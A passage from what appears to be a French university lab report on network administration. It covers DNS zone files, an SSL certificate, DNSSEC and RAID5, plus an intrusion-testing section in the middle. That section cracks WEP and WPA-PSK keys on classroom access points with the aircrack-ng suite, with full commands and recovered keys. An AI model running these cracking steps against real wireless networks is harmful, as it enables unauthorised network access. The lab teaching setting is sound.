             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avions une erreur à propos du subsystem. Pour que cela fonctionne, il nous manquait la commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install linux-image-3.16.0-4-amd64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de la machine, nous créons le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mkfs /dev/md0&lt;br /&gt;
root@GreenArrow:~# mkdir /datamd0&lt;br /&gt;
root@GreenArrow:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
